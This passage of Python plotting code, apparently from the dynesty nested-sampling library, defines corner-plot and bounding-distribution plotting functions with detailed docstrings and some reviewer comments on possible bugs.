                ax.plot(-logvol[::thin][sel],
                        x[::thin][sel],
                        color=connect_color,
                        **connect_kwargs)
        # Add truth value(s).
        if truths is not None and truths[i] is not None:
            # A truth entry may itself be an iterable of values; fall back
            # to a single line when it is a scalar.
            try:
                [
                    ax.axhline(t, color=truth_color, **truth_kwargs)
                    for t in truths[i]
                ]
            except:
                ax.axhline(truths[i], color=truth_color, **truth_kwargs)
        # Plot marginalized 1-D posterior.
        # Establish axes.
        if np.shape(samples)[0] == 1:
            # 1-D case: posterior drawn on axes[0] (see NOTE at the trace
            # panel above regarding the panel ordering).
            ax = axes[0]
        else:
            ax = axes[i, 1]
        # Set color(s).
        if isinstance(post_color, str_type):
            color = post_color
        else:
            color = post_color[i]
        # Setup axes
        ax.set_xlim(span[i])
        if max_n_ticks == 0:
            ax.xaxis.set_major_locator(NullLocator())
            ax.yaxis.set_major_locator(NullLocator())
        else:
            ax.xaxis.set_major_locator(MaxNLocator(max_n_ticks))
            ax.yaxis.set_major_locator(NullLocator())
        # Label axes.
        sf = ScalarFormatter(useMathText=use_math_text)
        ax.xaxis.set_major_formatter(sf)
        ax.set_xlabel(labels[i], **label_kwargs)
        # Generate distribution.
        s = smooth[i]
        if isinstance(s, int_type):
            # If `s` is an integer, plot a weighted histogram with
            # `s` bins within the provided bounds.
            n, b, _ = ax.hist(x,
                              bins=s,
                              weights=weights,
                              color=color,
                              range=np.sort(span[i]),
                              **post_kwargs)
            x0 = np.array(list(zip(b[:-1], b[1:]))).flatten()
            y0 = np.array(list(zip(n, n))).flatten()
        else:
            # If `s` is a float, oversample the data relative to the
            # smoothing filter by a factor of 10, then use a Gaussian
            # filter to smooth the results.
            bins = int(round(10. / s))
            n, b = np.histogram(x,
                                bins=bins,
                                weights=weights,
                                range=np.sort(span[i]))
            n = norm_kde(n, 10.)
            x0 = 0.5 * (b[1:] + b[:-1])
            y0 = n
        ax.fill_between(x0, y0, color=color, **post_kwargs)
        ax.set_ylim([0., max(y0) * 1.05])
        # Plot quantiles.
        if quantiles is not None and len(quantiles) > 0:
            qs = _quantile(x, quantiles, weights=weights)
            for q in qs:
                ax.axvline(q, lw=2, ls="dashed", color=color)
            if verbose:
                print("Quantiles:")
                print(labels[i], [blob for blob in zip(quantiles, qs)])
        # Add truth value(s).
        if truths is not None and truths[i] is not None:
            try:
                [
                    ax.axvline(t, color=truth_color, **truth_kwargs)
                    for t in truths[i]
                ]
            except:
                ax.axvline(truths[i], color=truth_color, **truth_kwargs)
        # Set titles.
        if show_titles:
            title = None
            if title_fmt is not None:
                ql, qm, qh = _quantile(x, title_quantiles, weights=weights)
                q_minus, q_plus = qm - ql, qh - qm
                fmt = "{{0:{0}}}".format(title_fmt).format
                title = r"${{{0}}}_{{-{1}}}^{{+{2}}}$"
                title = title.format(fmt(qm), fmt(q_minus), fmt(q_plus))
                title = "{0} = {1}".format(labels[i], title)
                ax.set_title(title, **title_kwargs)
    return fig, axes
def cornerpoints(results,
                 dims=None,
                 thin=1,
                 span=None,
                 cmap='plasma',
                 color=None,
                 kde=True,
                 nkde=1000,
                 plot_kwargs=None,
                 labels=None,
                 label_kwargs=None,
                 truths=None,
                 truth_color='red',
                 truth_kwargs=None,
                 max_n_ticks=5,
                 use_math_text=False,
                 fig=None):
    """
    Generate a (sub-)corner plot of (weighted) samples.
    Parameters
    ----------
    results : :class:`~dynesty.results.Results` instance
        A :class:`~dynesty.results.Results` instance from a nested
        sampling run. **Compatible with results derived from**
        `nestle <http://kylebarbary.com/nestle/>`_.
    dims : iterable of shape (ndim,), optional
        The subset of dimensions that should be plotted. If not provided,
        all dimensions will be shown.
    thin : int, optional
        Thin the samples so that only each `thin`-th sample is plotted.
        Default is `1` (no thinning).
    span : iterable with shape (ndim,), optional
        A list where each element is either a length-2 tuple containing
        lower and upper bounds or a float from `(0., 1.]` giving the
        fraction of (weighted) samples to include. If a fraction is provided,
        the bounds are chosen to be equal-tailed. An example would be::
            span = [(0., 10.), 0.95, (5., 6.)]
        Default is `1.` for all parameters (no bound).
    cmap : str, optional
        A `~matplotlib`-style colormap used when plotting the points,
        where each point is colored according to its weight. Default is
        `'plasma'`.
    color : str, optional
        A `~matplotlib`-style color used when plotting the points.
        This overrides the `cmap` option by giving all points
        the same color. Default is `None` (not used).
    kde : bool, optional
        Whether to use kernel density estimation to estimate and plot
        the PDF of the importance weights as a function of log-volume
        (as opposed to the importance weights themselves). Default is
        `True`.
    nkde : int, optional
        The number of grid points used when plotting the kernel density
        estimate. Default is `1000`.
    plot_kwargs : dict, optional
        Extra keyword arguments that will be used for plotting the points.
    labels : iterable with shape (ndim,), optional
        A list of names for each parameter. If not provided, the default name
        used when plotting will follow :math:`x_i` style.
    label_kwargs : dict, optional
        Extra keyword arguments that will be sent to the
        `~matplotlib.axes.Axes.set_xlabel` and
        `~matplotlib.axes.Axes.set_ylabel` methods.
    truths : iterable with shape (ndim,), optional
        A list of reference values that will be overplotted on the traces and
        marginalized 1-D posteriors as solid horizontal/vertical lines.
        Individual values can be exempt using `None`. Default is `None`.
    truth_color : str or iterable with shape (ndim,), optional
        A `~matplotlib`-style color (either a single color or a different
        value for each subplot) used when plotting `truths`.
        Default is `'red'`.
    truth_kwargs : dict, optional
        Extra keyword arguments that will be used for plotting the vertical
        and horizontal lines with `truths`.
    max_n_ticks : int, optional
        Maximum number of ticks allowed. Default is `5`.
    use_math_text : bool, optional
        Whether the axis tick labels for very large/small exponents should be
        displayed as powers of 10 rather than using `e`. Default is `False`.
    fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
        If provided, overplot the points onto the provided figure object.
        Otherwise, by default an internal figure is generated.
    Returns
    -------
    cornerpoints : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
        Output (sub-)corner plot of (weighted) samples.
    """
    # Initialize values.
    if truth_kwargs is None:
        truth_kwargs = dict()
    if label_kwargs is None:
        label_kwargs = dict()
    if plot_kwargs is None:
        plot_kwargs = dict()
    # Set defaults.
    # NOTE: the caller-supplied kwargs dicts are mutated in place here.
    plot_kwargs['s'] = plot_kwargs.get('s', 1)
    plot_kwargs['edgecolor'] = plot_kwargs.get('edgecolor', None)
    plot_kwargs['edgecolors'] = plot_kwargs.get('edgecolors', None)
    truth_kwargs['linestyle'] = truth_kwargs.get('linestyle', 'solid')
    truth_kwargs['linewidth'] = truth_kwargs.get('linewidth', 2)
    truth_kwargs['alpha'] = truth_kwargs.get('alpha', 0.7)
    # Extract weighted samples.
    samples = results['samples']
    logvol = results['logvol']
    try:
        weights = np.exp(results['logwt'] - results['logz'][-1])
    except:
        weights = results['weights']
    # NOTE(review): unlike `traceplot`, the KDE estimate here *replaces*
    # `weights` entirely, so the span quantiles and point colors below both
    # use the smoothed weights -- confirm this is intended.
    if kde:
        # Derive kernel density estimate.
        wt_kde = gaussian_kde(resample_equal(-logvol, weights)) # KDE
        logvol_grid = np.linspace(logvol[0], logvol[-1], nkde) # resample
        wt_grid = wt_kde.pdf(-logvol_grid) # evaluate KDE PDF
        weights = np.interp(-logvol, -logvol_grid, wt_grid) # interpolate
    # Deal with 1D results. A number of extra catches are also here
    # in case users are trying to plot other results besides the `Results`
    # instance generated by `dynesty`.
    samples = np.atleast_1d(samples)
    if len(samples.shape) == 1:
        samples = np.atleast_2d(samples)
    else:
        assert len(samples.shape) == 2, "Samples must be 1- or 2-D."
        samples = samples.T
    assert samples.shape[0] <= samples.shape[1], "There are more " \
                                                 "dimensions than samples!"
    # Slice samples based on provided `dims`.
    if dims is not None:
        samples = samples[dims]
    ndim, nsamps = samples.shape
    # Check weights.
    if weights.ndim != 1:
        raise ValueError("Weights must be 1-D.")
    if nsamps != weights.shape[0]:
        raise ValueError("The number of weights and samples disagree!")
    # Determine plotting bounds.
    if span is not None:
        if len(span) != ndim:
            raise ValueError("Dimension mismatch between samples and span.")
        for i, _ in enumerate(span):
            try:
                xmin, xmax = span[i]
            except:
                # A scalar entry is a credible-interval fraction; convert
                # it into explicit bounds via weighted quantiles.
                q = [0.5 - 0.5 * span[i], 0.5 + 0.5 * span[i]]
                span[i] = _quantile(samples[i], q, weights=weights)
    # Set labels
    if labels is None:
        labels = [r"$x_{" + str(i + 1) + "}$" for i in range(ndim)]
    # Set colormap.
    if color is None:
        color = weights
    # Setup axis layout (from `corner.py`).
    factor = 2.0  # size of side of one panel
    lbdim = 0.5 * factor  # size of left/bottom margin
    trdim = 0.2 * factor  # size of top/right margin
    whspace = 0.05  # size of width/height margin
    plotdim = factor * (ndim - 1.) + factor * (ndim - 2.) * whspace
    dim = lbdim + plotdim + trdim  # total size
    # Initialize figure.
    fig, axes = _make_subplots(fig, ndim - 1, ndim - 1, dim, dim)
    # Format figure.
    lb = lbdim / dim
    tr = (lbdim + plotdim) / dim
    fig.subplots_adjust(left=lb,
                        bottom=lb,
                        right=tr,
                        top=tr,
                        wspace=whspace,
                        hspace=whspace)
    # Plot the 2-D projected samples.
    # Row i shows samples[i + 1] on the vertical axis against samples[j]
    # on the horizontal axis, giving the lower-triangular corner layout.
    for i, x in enumerate(samples[1:]):
        for j, y in enumerate(samples[:-1]):
            try:
                ax = axes[i, j]
            except:
                ax = axes
            # Setup axes.
            if span is not None:
                # NOTE(review): the vertical axis shows samples[i + 1] but
                # its limits (and the in-bounds mask below) use span[i],
                # while the label uses labels[i + 1] -- possible off-by-one;
                # verify against upstream before relying on custom spans.
                ax.set_xlim(span[j])
                ax.set_ylim(span[i])
            if j > i:
                ax.set_frame_on(False)
                ax.set_xticks([])
                ax.set_yticks([])
                continue
            if max_n_ticks == 0:
                ax.xaxis.set_major_locator(NullLocator())
                ax.yaxis.set_major_locator(NullLocator())
            else:
                ax.xaxis.set_major_locator(
                    MaxNLocator(max_n_ticks, prune="lower"))
                ax.yaxis.set_major_locator(
                    MaxNLocator(max_n_ticks, prune="lower"))
            # Label axes.
            sf = ScalarFormatter(useMathText=use_math_text)
            ax.xaxis.set_major_formatter(sf)
            ax.yaxis.set_major_formatter(sf)
            if i < ndim - 2:
                ax.set_xticklabels([])
            else:
                [l.set_rotation(45) for l in ax.get_xticklabels()]
                ax.set_xlabel(labels[j], **label_kwargs)
                ax.xaxis.set_label_coords(0.5, -0.3)
            if j > 0:
                ax.set_yticklabels([])
            else:
                [l.set_rotation(45) for l in ax.get_yticklabels()]
                ax.set_ylabel(labels[i + 1], **label_kwargs)
                ax.yaxis.set_label_coords(-0.3, 0.5)
            # Plot distribution.
            # Mask out points falling outside the requested spans on
            # either coordinate before scattering.
            in_bounds = np.ones_like(y).astype('bool')
            if span is not None and span[i] is not None:
                in_bounds *= ((x >= span[i][0]) & (x <= span[i][1]))
            if span is not None and span[j] is not None:
                in_bounds *= ((y >= span[j][0]) & (y <= span[j][1]))
            if isinstance(color, str):
                cur_color = color
            else:
                cur_color = color[in_bounds][::thin]
            ax.scatter(y[in_bounds][::thin],
                       x[in_bounds][::thin],
                       c=cur_color,
                       cmap=cmap,
                       **plot_kwargs)
            # Add truth values
            if truths is not None:
                # A truth entry may itself be an iterable; fall back to a
                # single line when it is a scalar.
                if truths[j] is not None:
                    try:
                        [
                            ax.axvline(t, color=truth_color, **truth_kwargs)
                            for t in truths[j]
                        ]
                    except:
                        ax.axvline(truths[j],
                                   color=truth_color,
                                   **truth_kwargs)
                if truths[i + 1] is not None:
                    try:
                        [
                            ax.axhline(t, color=truth_color, **truth_kwargs)
                            for t in truths[i + 1]
                        ]
                    except:
                        ax.axhline(truths[i + 1],
                                   color=truth_color,
                                   **truth_kwargs)
    return (fig, axes)
def cornerplot(results,
               dims=None,
               span=None,
               quantiles=[0.025, 0.5, 0.975],
               color='black',
               smooth=0.02,
               quantiles_2d=None,
               hist_kwargs=None,
               hist2d_kwargs=None,
               labels=None,
               label_kwargs=None,
               show_titles=False,
               title_quantiles=[0.025, 0.5, 0.975],
               title_fmt=".2f",
               title_kwargs=None,
               truths=None,
               truth_color='red',
               truth_kwargs=None,
               max_n_ticks=5,
               top_ticks=False,
               use_math_text=False,
               verbose=False,
               fig=None):
    """
    Generate a corner plot of the 1-D and 2-D marginalized posteriors.
    Parameters
    ----------
    results : :class:`~dynesty.results.Results` instance
        A :class:`~dynesty.results.Results` instance from a nested
        sampling run. **Compatible with results derived from**
        `nestle <http://kylebarbary.com/nestle/>`_.
    dims : iterable of shape (ndim,), optional
        The subset of dimensions that should be plotted. If not provided,
        all dimensions will be shown.
    span : iterable with shape (ndim,), optional
        A list where each element is either a length-2 tuple containing
        lower and upper bounds or a float from `(0., 1.]` giving the
        fraction of (weighted) samples to include. If a fraction is provided,
        the bounds are chosen to be equal-tailed. An example would be::
            span = [(0., 10.), 0.95, (5., 6.)]
        Default is `0.999999426697` (5-sigma credible interval).
    quantiles : iterable, optional
        A list of fractional quantiles to overplot on the 1-D marginalized
        posteriors as vertical dashed lines. Default is `[0.025, 0.5, 0.975]`
        (spanning the 95%/2-sigma credible interval).
    color : str or iterable with shape (ndim,), optional
        A `~matplotlib`-style color (either a single color or a different
        value for each subplot) used when plotting the histograms.
        Default is `'black'`.
    smooth : float or iterable with shape (ndim,), optional
        The standard deviation (either a single value or a different value for
        each subplot) for the Gaussian kernel used to smooth the 1-D and 2-D
        marginalized posteriors, expressed as a fraction of the span.
        Default is `0.02` (2% smoothing). If an integer is provided instead,
        this will instead default to a simple (weighted) histogram with
        `bins=smooth`.
    quantiles_2d : iterable with shape (nquant,), optional
        The quantiles used for plotting the smoothed 2-D distributions.
        If not provided, these default to 0.5, 1, 1.5, and 2-sigma contours
        roughly corresponding to quantiles of `[0.1, 0.4, 0.65, 0.85]`.
    hist_kwargs : dict, optional
        Extra keyword arguments to send to the 1-D (smoothed) histograms.
    hist2d_kwargs : dict, optional
        Extra keyword arguments to send to the 2-D (smoothed) histograms.
    labels : iterable with shape (ndim,), optional
        A list of names for each parameter. If not provided, the default name
        used when plotting will follow :math:`x_i` style.
    label_kwargs : dict, optional
        Extra keyword arguments that will be sent to the
        `~matplotlib.axes.Axes.set_xlabel` and
        `~matplotlib.axes.Axes.set_ylabel` methods.
    show_titles : bool, optional
        Whether to display a title above each 1-D marginalized posterior
        showing the 0.5 quantile along with the upper/lower bounds associated
        with the 0.025 and 0.975 (95%/2-sigma credible interval) quantiles.
        Default is `False`.
    title_quantiles : iterable, optional
        A list of fractional quantiles to use in the title. Default is
        `[0.025, 0.5, 0.975]` (median plus 95%/2-sigma credible interval).
    title_fmt : str, optional
        The format string for the quantiles provided in the title. Default is
        `'.2f'`.
    title_kwargs : dict, optional
        Extra keyword arguments that will be sent to the
        `~matplotlib.axes.Axes.set_title` command.
    truths : iterable with shape (ndim,), optional
        A list of reference values that will be overplotted on the traces and
        marginalized 1-D posteriors as solid horizontal/vertical lines.
        Individual values can be exempt using `None`. Default is `None`.
    truth_color : str or iterable with shape (ndim,), optional
        A `~matplotlib`-style color (either a single color or a different
        value for each subplot) used when plotting `truths`.
        Default is `'red'`.
    truth_kwargs : dict, optional
        Extra keyword arguments that will be used for plotting the vertical
        and horizontal lines with `truths`.
    max_n_ticks : int, optional
        Maximum number of ticks allowed. Default is `5`.
    top_ticks : bool, optional
        Whether to label the top (rather than bottom) ticks. Default is
        `False`.
    use_math_text : bool, optional
        Whether the axis tick labels for very large/small exponents should be
        displayed as powers of 10 rather than using `e`. Default is `False`.
    verbose : bool, optional
        Whether to print the values of the computed quantiles associated with
        each parameter. Default is `False`.
    fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
        If provided, overplot the traces and marginalized 1-D posteriors
        onto the provided figure. Otherwise, by default an
        internal figure is generated.
    Returns
    -------
    cornerplot : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
        Output corner plot.
    """
    # Initialize values.
    if quantiles is None:
        quantiles = []
    if truth_kwargs is None:
        truth_kwargs = dict()
    if label_kwargs is None:
        label_kwargs = dict()
    if title_kwargs is None:
        title_kwargs = dict()
    if hist_kwargs is None:
        hist_kwargs = dict()
    if hist2d_kwargs is None:
        hist2d_kwargs = dict()
    # Set defaults.
    # NOTE: the caller-supplied kwargs dicts are mutated in place here.
    hist_kwargs['alpha'] = hist_kwargs.get('alpha', 0.6)
    hist2d_kwargs['alpha'] = hist2d_kwargs.get('alpha', 0.6)
    hist2d_kwargs['levels'] = hist2d_kwargs.get('levels', quantiles_2d)
    truth_kwargs['linestyle'] = truth_kwargs.get('linestyle', 'solid')
    truth_kwargs['linewidth'] = truth_kwargs.get('linewidth', 2)
    truth_kwargs['alpha'] = truth_kwargs.get('alpha', 0.7)
    # Extract weighted samples.
    samples = results['samples']
    try:
        weights = np.exp(results['logwt'] - results['logz'][-1])
    except:
        weights = results['weights']
    # Deal with 1D results. A number of extra catches are also here
    # in case users are trying to plot other results besides the `Results`
    # instance generated by `dynesty`.
    samples = np.atleast_1d(samples)
    if len(samples.shape) == 1:
        samples = np.atleast_2d(samples)
    else:
        assert len(samples.shape) == 2, "Samples must be 1- or 2-D."
        samples = samples.T
    assert samples.shape[0] <= samples.shape[1], "There are more " \
                                                 "dimensions than samples!"
    # Slice samples based on provided `dims`.
    if dims is not None:
        samples = samples[dims]
    ndim, nsamps = samples.shape
    # Check weights.
    if weights.ndim != 1:
        raise ValueError("Weights must be 1-D.")
    if nsamps != weights.shape[0]:
        raise ValueError("The number of weights and samples disagree!")
    # Determine plotting bounds.
    if span is None:
        span = [0.999999426697 for i in range(ndim)]
    span = list(span)
    if len(span) != ndim:
        raise ValueError("Dimension mismatch between samples and span.")
    for i, _ in enumerate(span):
        try:
            xmin, xmax = span[i]
        except:
            # A scalar entry is a credible-interval fraction; convert it
            # into explicit (lower, upper) bounds via weighted quantiles.
            q = [0.5 - 0.5 * span[i], 0.5 + 0.5 * span[i]]
            span[i] = _quantile(samples[i], q, weights=weights)
    # Set labels
    if labels is None:
        labels = [r"$x_{" + str(i + 1) + "}$" for i in range(ndim)]
    # Setting up smoothing.
    if (isinstance(smooth, int_type) or isinstance(smooth, float_type)):
        smooth = [smooth for i in range(ndim)]
    # Setup axis layout (from `corner.py`).
    factor = 2.0  # size of side of one panel
    lbdim = 0.5 * factor  # size of left/bottom margin
    trdim = 0.2 * factor  # size of top/right margin
    whspace = 0.05  # size of width/height margin
    plotdim = factor * ndim + factor * (ndim - 1.) * whspace  # plot size
    dim = lbdim + plotdim + trdim  # total size
    # Initialize figure.
    fig, axes = _make_subplots(fig, ndim, ndim, dim, dim)
    # Format figure.
    lb = lbdim / dim
    tr = (lbdim + plotdim) / dim
    fig.subplots_adjust(left=lb,
                        bottom=lb,
                        right=tr,
                        top=tr,
                        wspace=whspace,
                        hspace=whspace)
    # Plotting.
    # Outer loop draws the diagonal (1-D marginalized) panel for dim i;
    # the nested loop then fills in the off-diagonal 2-D panels of row i.
    for i, x in enumerate(samples):
        if np.shape(samples)[0] == 1:
            ax = axes
        else:
            ax = axes[i, i]
        # Plot the 1-D marginalized posteriors.
        # Setup axes
        ax.set_xlim(span[i])
        if max_n_ticks == 0:
            ax.xaxis.set_major_locator(NullLocator())
            ax.yaxis.set_major_locator(NullLocator())
        else:
            ax.xaxis.set_major_locator(MaxNLocator(max_n_ticks, prune="lower"))
            ax.yaxis.set_major_locator(NullLocator())
        # Label axes.
        sf = ScalarFormatter(useMathText=use_math_text)
        ax.xaxis.set_major_formatter(sf)
        if i < ndim - 1:
            if top_ticks:
                ax.xaxis.set_ticks_position("top")
                [l.set_rotation(45) for l in ax.get_xticklabels()]
            else:
                ax.set_xticklabels([])
        else:
            [l.set_rotation(45) for l in ax.get_xticklabels()]
            ax.set_xlabel(labels[i], **label_kwargs)
            ax.xaxis.set_label_coords(0.5, -0.3)
        # Generate distribution.
        sx = smooth[i]
        if isinstance(sx, int_type):
            # If `sx` is an integer, plot a weighted histogram with
            # `sx` bins within the provided bounds.
            n, b, _ = ax.hist(x,
                              bins=sx,
                              weights=weights,
                              color=color,
                              range=np.sort(span[i]),
                              **hist_kwargs)
        else:
            # If `sx` is a float, oversample the data relative to the
            # smoothing filter by a factor of 10, then use a Gaussian
            # filter to smooth the results.
            bins = int(round(10. / sx))
            n, b = np.histogram(x,
                                bins=bins,
                                weights=weights,
                                range=np.sort(span[i]))
            n = norm_kde(n, 10.)
            b0 = 0.5 * (b[1:] + b[:-1])
            n, b, _ = ax.hist(b0,
                              bins=b,
                              weights=n,
                              range=np.sort(span[i]),
                              color=color,
                              **hist_kwargs)
        ax.set_ylim([0., max(n) * 1.05])
        # Plot quantiles.
        if quantiles is not None and len(quantiles) > 0:
            qs = _quantile(x, quantiles, weights=weights)
            for q in qs:
                ax.axvline(q, lw=2, ls="dashed", color=color)
            if verbose:
                print("Quantiles:")
                print(labels[i], [blob for blob in zip(quantiles, qs)])
        # Add truth value(s).
        if truths is not None and truths[i] is not None:
            # A truth entry may itself be an iterable of values; fall back
            # to a single line when it is a scalar.
            try:
                [
                    ax.axvline(t, color=truth_color, **truth_kwargs)
                    for t in truths[i]
                ]
            except:
                ax.axvline(truths[i], color=truth_color, **truth_kwargs)
        # Set titles.
        if show_titles:
            title = None
            if title_fmt is not None:
                ql, qm, qh = _quantile(x, title_quantiles, weights=weights)
                q_minus, q_plus = qm - ql, qh - qm
                fmt = "{{0:{0}}}".format(title_fmt).format
                title = r"${{{0}}}_{{-{1}}}^{{+{2}}}$"
                title = title.format(fmt(qm), fmt(q_minus), fmt(q_plus))
                title = "{0} = {1}".format(labels[i], title)
                ax.set_title(title, **title_kwargs)
        for j, y in enumerate(samples):
            if np.shape(samples)[0] == 1:
                ax = axes
            else:
                ax = axes[i, j]
            # Plot the 2-D marginalized posteriors.
            # Setup axes.
            if j > i:
                ax.set_frame_on(False)
                ax.set_xticks([])
                ax.set_yticks([])
                continue
            elif j == i:
                continue
            if max_n_ticks == 0:
                ax.xaxis.set_major_locator(NullLocator())
                ax.yaxis.set_major_locator(NullLocator())
            else:
                ax.xaxis.set_major_locator(
                    MaxNLocator(max_n_ticks, prune="lower"))
                ax.yaxis.set_major_locator(
                    MaxNLocator(max_n_ticks, prune="lower"))
            # Label axes.
            sf = ScalarFormatter(useMathText=use_math_text)
            ax.xaxis.set_major_formatter(sf)
            ax.yaxis.set_major_formatter(sf)
            if i < ndim - 1:
                ax.set_xticklabels([])
            else:
                [l.set_rotation(45) for l in ax.get_xticklabels()]
                ax.set_xlabel(labels[j], **label_kwargs)
                ax.xaxis.set_label_coords(0.5, -0.3)
            if j > 0:
                ax.set_yticklabels([])
            else:
                [l.set_rotation(45) for l in ax.get_yticklabels()]
                ax.set_ylabel(labels[i], **label_kwargs)
                ax.yaxis.set_label_coords(-0.3, 0.5)
            # Generate distribution.
            # `sx` is the smoothing for dimension i (set in the diagonal
            # pass above); `sy` is the smoothing for dimension j.
            sy = smooth[j]
            check_ix = isinstance(sx, int_type)
            check_iy = isinstance(sy, int_type)
            if check_ix and check_iy:
                fill_contours = False
                plot_contours = False
            else:
                fill_contours = True
                plot_contours = True
            # NOTE(review): because `hist2d_kwargs` is mutated in place,
            # the fill/plot-contour choice made for the first off-diagonal
            # panel sticks for all later panels -- confirm intended.
            hist2d_kwargs['fill_contours'] = hist2d_kwargs.get(
                'fill_contours', fill_contours)
            hist2d_kwargs['plot_contours'] = hist2d_kwargs.get(
                'plot_contours', plot_contours)
            _hist2d(y,
                    x,
                    ax=ax,
                    span=[span[j], span[i]],
                    weights=weights,
                    color=color,
                    smooth=[sy, sx],
                    **hist2d_kwargs)
            # Add truth values
            if truths is not None:
                if truths[j] is not None:
                    try:
                        [
                            ax.axvline(t, color=truth_color, **truth_kwargs)
                            for t in truths[j]
                        ]
                    except:
                        ax.axvline(truths[j],
                                   color=truth_color,
                                   **truth_kwargs)
                if truths[i] is not None:
                    try:
                        [
                            ax.axhline(t, color=truth_color, **truth_kwargs)
                            for t in truths[i]
                        ]
                    except:
                        ax.axhline(truths[i],
                                   color=truth_color,
                                   **truth_kwargs)
    return (fig, axes)
def boundplot(results,
              dims,
              it=None,
              idx=None,
              prior_transform=None,
              periodic=None,
              reflective=None,
              ndraws=5000,
              color='gray',
              plot_kwargs=None,
              labels=None,
              label_kwargs=None,
              max_n_ticks=5,
              use_math_text=False,
              show_live=False,
              live_color='darkviolet',
              live_kwargs=None,
              span=None,
              fig=None):
    """
    Return the bounding distribution used to propose either (1) live points
    at a given iteration or (2) a specific dead point during
    the course of a run, projected onto the two dimensions specified
    by `dims`.
    Parameters
    ----------
    results : :class:`~dynesty.results.Results` instance
        A :class:`~dynesty.results.Results` instance from a nested
        sampling run.
    dims : length-2 tuple
        The dimensions used to plot the bounding.
    it : int, optional
        If provided, returns the bounding distribution at the specified
        iteration of the nested sampling run. **Note that this option and
        `idx` are mutually exclusive.**
    idx : int, optional
        If provided, returns the bounding distribution used to propose the
        dead point at the specified iteration of the nested sampling run.
        **Note that this option and `it` are mutually exclusive.**
    prior_transform : func, optional
        The function transforming samples within the unit cube back to samples
        in the native model space. If provided, the transformed bounding
        distribution will be plotted in the native model space.
    periodic : iterable, optional
        A list of indices for parameters with periodic boundary conditions.
        These parameters *will not* have their positions constrained to be
        within the unit cube, enabling smooth behavior for parameters
        that may wrap around the edge. Default is `None` (i.e. no periodic
        boundary conditions).
    reflective : iterable, optional
        A list of indices for parameters with reflective boundary conditions.
        These parameters *will not* have their positions constrained to be
        within the unit cube, enabling smooth behavior for parameters
        that may reflect at the edge. Default is `None` (i.e. no reflective
        boundary conditions).
    ndraws : int, optional
        The number of random samples to draw from the bounding distribution
        when plotting. Default is `5000`.
    color : str, optional
        The color of the points randomly sampled from the bounding
        distribution. Default is `'gray'`.
    plot_kwargs : dict, optional
        Extra keyword arguments used when plotting the bounding draws.
    labels : iterable with shape (ndim,), optional
        A list of names for each parameter. If not provided, the default name
        used when plotting will follow :math:`x_i` style.
    label_kwargs : dict, optional
        Extra keyword arguments that will be sent to the
        `~matplotlib.axes.Axes.set_xlabel` and
        `~matplotlib.axes.Axes.set_ylabel` methods.
    max_n_ticks : int, optional
        Maximum number of ticks allowed. Default is `5`.
    use_math_text : bool, optional
        Whether the axis tick labels for very large/small exponents should be
        displayed as powers of 10 rather than using `e`. Default is `False`.
    show_live : bool, optional
        Whether the live points at a given iteration (for `it`) or
        associated with the bounding (for `idx`) should be highlighted.
        Default is `False`. In the dynamic case, only the live points
        associated with the batch used to construct the relevant bound
        are plotted.
    live_color : str, optional
        The color of the live points. Default is `'darkviolet'`.
    live_kwargs : dict, optional
        Extra keyword arguments used when plotting the live points.
    span : iterable with shape (2,), optional
        A list where each element is a length-2 tuple containing
        lower and upper bounds. Default is `None` (no bound).
    fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
        If provided, overplot the draws onto the provided figure.
        Otherwise, by default an internal figure is generated.
    Returns
    -------
    bounding_plot : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
        Output plot of the bounding distribution.
    """
    # Initialize values.
    if plot_kwargs is None:
        plot_kwargs = dict()
    if label_kwargs is None:
        label_kwargs = dict()
    if live_kwargs is None:
        live_kwargs = dict()
    # Check that either `idx` or `it` has been specified.
    if (it is None and idx is None) or (it is not None and idx is not None):
        raise ValueError("You must specify either an iteration or an index!")
    # Set defaults.
    plot_kwargs['marker'] = plot_kwargs.get('marker', 'o')
    plot_kwargs['linestyle'] = plot_kwargs.get('linestyle', 'None')
    plot_kwargs['markersize'] = plot_kwargs.get('markersize', 1)
    plot_kwargs['alpha'] = plot_kwargs.get('alpha', 0.4)
    live_kwargs['marker'] = live_kwargs.get('marker', 'o')
    live_kwargs['linestyle'] = live_kwargs.get('linestyle', 'None')
    live_kwargs['markersize'] = live_kwargs.get('markersize', 1)
    # Extract bounding distributions.
    try:
        bounds = results['bound']
    except KeyError:
        raise ValueError("No bounds were saved in the results!")
    nsamps = len(results['samples'])
    # Mask marking which dimensions are unconstrained by the unit cube
    # (periodic/reflective); used below to filter out-of-cube proposals.
    nonbounded = get_nonbounded(bounds[0].n, periodic, reflective)
    if it is not None:
        if it >= nsamps:
            raise ValueError("The iteration requested goes beyond the "
                             "number of iterations in the run.")
        # Extract bound iterations.
        try:
            bound_iter = np.array(results['bound_iter'])
        except:
            raise ValueError("Cannot reconstruct the bound used at the "
                             "specified iteration since bound "
                             "iterations were not saved in the results.")
        # Find bound at the specified iteration.
        if it == 0:
            pidx = 0
        else:
            pidx = bound_iter[it]
    else:
        if idx >= nsamps:
            raise ValueError("The index requested goes beyond the "
                             "number of samples in the run.")
        try:
            samples_bound = results['samples_bound']
        except:
            raise ValueError("Cannot reconstruct the bound used to "
                             "compute the specified dead point since "
                             "sample bound indices were not saved "
                             "in the results.")
        # Grab relevant bound.
        pidx = samples_bound[idx]
    # Get desired bound.
    bound = bounds[pidx]
    # Do we want to show the live points at the specified iteration?
    # If so, we need to rewind our bound to check.
    # (We could also go forward; this is an arbitrary choice.)
    if show_live:
        try:
            # We can only reconstruct the run if the final set of live points
            # were added to the results. This is true by default for dynamic
            # nested sampling runs but not guaranteed for standard runs.
            nlive = results['nlive']
            niter = results['niter']
            if nsamps - niter != nlive:
                raise ValueError("Cannot reconstruct bound because the "
                                 "final set of live points are not included "
                                 "in the results.")
            # Grab our final set of live points (with proper IDs).
            samples = results['samples_u']
            samples_id = results['samples_id']
            ndim = samples.shape[1]
            live_u = np.empty((nlive, ndim))
            live_u[samples_id[-nlive:]] = samples[-nlive:]
            # Find generating bound ID if necessary.
            if it is None:
                it = results['samples_it'][idx]
            # Run our sampling backwards.
            for i in range(1, niter - it + 1):
                r = -(nlive + i)
                uidx = samples_id[r]
                live_u[uidx] = samples[r]
        except:
            # NOTE(review): this broad `except` is deliberate control flow —
            # it catches both missing-key errors (e.g. no 'nlive' for dynamic
